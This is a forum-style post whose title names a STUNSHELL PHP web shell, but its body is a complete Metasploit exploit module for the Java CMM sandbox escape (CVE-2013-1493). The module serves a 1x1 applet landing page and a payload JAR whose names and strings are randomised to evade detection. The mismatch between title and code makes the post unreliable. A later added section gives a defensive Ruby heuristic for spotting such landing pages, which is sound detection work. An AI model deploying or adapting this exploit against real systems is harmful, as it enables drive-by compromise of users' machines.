STUNSHELL PHP Web Shell Remote Code Execution

Original poster, posted on 2013-4-4 17:31:17
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and
  # randomize the name of the entry class so the served file is not static.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Three request shapes: the JAR itself, the landing page, or a redirect to it.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename entries and rewrite the framework's own strings inside them.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Landing page: a 1x1 applet whose archive and class names are random.
  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end
```
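The landing page this module serves has a recognizable shape: a 1x1 applet whose archive and class names are random letters. As an added example, not part of the original post or of the Metasploit module, the following Ruby triage check flags that shape in an HTML body (e.g. one captured from a proxy log); the sample pages and names are constructed.

```ruby
# Added example (not from the original post): heuristic triage of HTML that
# embeds a hidden Java applet with machine-generated names, the landing-page
# shape produced by generate_html in the module above. Sample data constructed.

APPLET_RE = /<applet\b([^>]*)>/i
ATTR_RE   = /(\w+)\s*=\s*["']([^"']*)["']/

# Collect the attributes of every <applet> tag as a lowercase-keyed hash.
def applet_tags(html)
  html.scan(APPLET_RE).map do |(attrs)|
    attrs.scan(ATTR_RE).each_with_object({}) { |(k, v), h| h[k.downcase] = v }
  end
end

# Names from rand_text_alpha are letters in jumbled case with few vowels;
# hand-written names are CamelCase or lowercase words with a normal vowel share.
def random_name?(name)
  base = File.basename(name.to_s, ".*")
  return false unless base.match?(/\A[A-Za-z]{4,}\z/)
  jumbled_case = !base.match?(/\A[A-Z]?[a-z]+(?:[A-Z][a-z]+)*\z/)
  vowel_ratio  = base.count("aeiouAEIOU").to_f / base.size
  jumbled_case || vowel_ratio < 0.25
end

# Returns one reason string per suspicious trait; an empty array means clean.
def hidden_applet_findings(html)
  applet_tags(html).flat_map do |a|
    reasons = []
    if a.fetch("width", "0").to_i <= 1 && a.fetch("height", "0").to_i <= 1
      reasons << "applet sized 1x1 or smaller"
    end
    reasons << "random-looking archive #{a['archive']}" if random_name?(a["archive"])
    reasons << "random-looking class #{a['code']}" if random_name?(a["code"])
    reasons
  end
end

# Constructed sample in the module's landing-page shape (names are invented).
SUSPECT_HTML = '<html><head><title>Loading, Please Wait...</title></head>' \
               '<body><center><p>Loading, Please Wait...</p></center>' \
               '<applet archive="qZwkxpFm.jar" code="xKqW.class" width="1" height="1">' \
               '</applet></body></html>'

# Constructed benign page for comparison.
BENIGN_HTML = '<applet archive="ImageViewer.jar" code="ImageViewer.class" ' \
              'width="640" height="480"></applet>'

puts hidden_applet_findings(SUSPECT_HTML)
puts(hidden_applet_findings(BENIGN_HTML).empty? ? "benign: nothing flagged" : "benign: flagged")
```

The name heuristic is a triage aid: short random names can by chance look word-like, so treat a hit as a reason to inspect the served JAR, not as a verdict.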